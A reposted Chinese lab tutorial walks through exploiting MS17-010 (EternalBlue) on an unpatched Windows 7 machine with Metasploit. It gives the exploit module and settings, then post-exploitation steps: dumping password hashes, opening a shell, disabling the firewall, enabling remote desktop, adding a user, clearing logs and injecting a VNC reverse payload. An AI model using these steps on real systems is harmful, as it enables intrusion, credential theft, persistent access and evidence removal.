其他分享
首页 > 其他分享> > kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

作者:互联网

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

前言:

提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

实验环境:

工具:metasploit

靶机两台:windows 7sp1和kali2020

攻击机IP地址:192.168.29.131

被攻击机IP地址:192.168.29.128

实验条件:两台机子可以互通的,并且windows 7sp1(无补丁)开启了445端口,防火墙是关闭的。
 

步骤:

1、在kali里面打开metasploit漏洞利用框架

2、搜索ms17-010漏洞利用模块 search 17-010

找到exploit/windows/smb/ms17_010_eternalblue

其中exploit具有攻击性,auxliary是用来验证的。

3、使用利用模块use+exploit/windows/smb/ms17_010_eternalblue

4、查看配置项 show options

5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)

再次查看配置项

6、实施攻击exploit/run

7、攻入目标主机

Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

 

在攻击进去的情况下演示几个功能

1、查看目标主机的操作系统信息(sysinfo)

2、对目标主机的屏幕进行截图(截图保存在/root下)

3、查看目标主机所有的用户名和密码(密码显示为hash值)

4获取shell页面

乱码解决方法:

输入chcp 65001可将乱码解决

5、关闭防火墙

6、关闭Telnet服务

7、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况

1)方法1:run  getgui  -e

(2)方法2:run post/windows/manage/enable_rdp

到windows7sp1上查看远程桌面功能启用情况

8、创建系统用户(创建用户名为:test,密码为:123456)

9、清除日志

 

使用VNC payload远程操控目标电脑

1,输入Background,返回退出meterpreter界面

2,查看set payload 参数(输入set payload 按两下 TAB键 )

找到windows/x64/vncinject/reverse_tcp,复制黏贴

3,set payload windows/x64/vncinject/reverse_tcp

4,set viewonly no

5,exploit

成功获取控制权

 

 

标签:查看,windows,Win7,010,漏洞,exploit,kail,ms17
来源: https://blog.csdn.net/qq_50854662/article/details/116891040